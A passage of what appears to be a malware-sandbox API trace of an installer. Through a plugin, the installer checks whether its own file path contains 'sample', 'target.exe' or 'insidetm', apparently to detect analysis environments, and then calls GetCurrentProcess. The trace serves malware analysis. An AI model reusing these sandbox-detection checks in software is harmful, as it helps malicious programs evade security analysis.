returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.908] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.909] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.909] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.909] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.909] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.909] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.909] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.909] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.909] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'sample')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'sample')i.R0 ?c") returned="ntdll::strstr(t R1, t 'sample')i.R0 ?c" [0157.909] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.909] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.909] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.910] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.910] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.910] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.910] lstrcpyA (in: 
lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.910] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.910] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.910] lstrcpynA (in: lpString1=0x323058, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.910] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.911] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.911] lstrlenA (lpString="strstr") returned 6 [0157.911] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.911] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] lstrcpynA (in: lpString1=0x3217a0, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.911] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="sample") returned 0x0 [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] 
wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.911] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.912] lstrlenA (lpString="0") returned 1 [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.912] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.912] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.912] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.912] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.912] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.913] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.913] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c" [0157.913] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.913] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.913] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.913] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.913] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.913] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df 
[0157.914] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.914] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.914] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.914] lstrcpynA (in: lpString1=0x323058, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.914] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.914] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.914] lstrlenA (lpString="strstr") returned 6 [0157.914] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.915] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] lstrcpynA (in: lpString1=0x3217a0, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.915] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="target.exe") returned 0x0 [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") 
returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.915] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.915] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.916] lstrlenA (lpString="0") returned 1 [0157.916] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.916] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.916] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.916] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.916] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.916] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.916] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.917] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.917] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c") returned="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c" [0157.917] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.917] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.917] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.917] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.917] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.918] 
GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.918] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.918] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.918] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.918] lstrcpynA (in: lpString1=0x323058, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.918] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.918] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.918] lstrlenA (lpString="strstr") returned 6 [0157.918] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.918] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] lstrcpynA (in: lpString1=0x3217a0, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.919] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="insidetm") returned 0x0 [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: 
lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.919] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.919] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.919] lstrlenA (lpString="0") returned 1 [0157.919] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrlenA (lpString="FALSE") returned 5 [0157.919] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.919] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrlenA (lpString="FALSE") returned 5 [0157.919] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.920] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrlenA (lpString="") returned 0 [0157.920] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 
48 [0157.920] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.920] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.920] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.921] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.921] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetCurrentProcess()p.s", iMaxLength=1024 | out: lpString1="kernel32::GetCurrentProcess()p.s") returned="kernel32::GetCurrentProcess()p.s" [0157.921] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.921] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.921] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.921] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.921] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.921] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.921] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.921] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.921] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetCurrentProcess" | out: lpString1="GetCurrentProcess") returned="GetCurrentProcess" [0157.921] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.922] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcess") returned 0x75ca1809 [0157.922] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.922] GetCurrentProcess () returned 0xffffffff 
[0157.922] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="-1") returned 2 [0157.922] lstrcpynA (in: lpString1=0x31441c, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.922] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.922] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.922] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.922] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.922] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.922] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 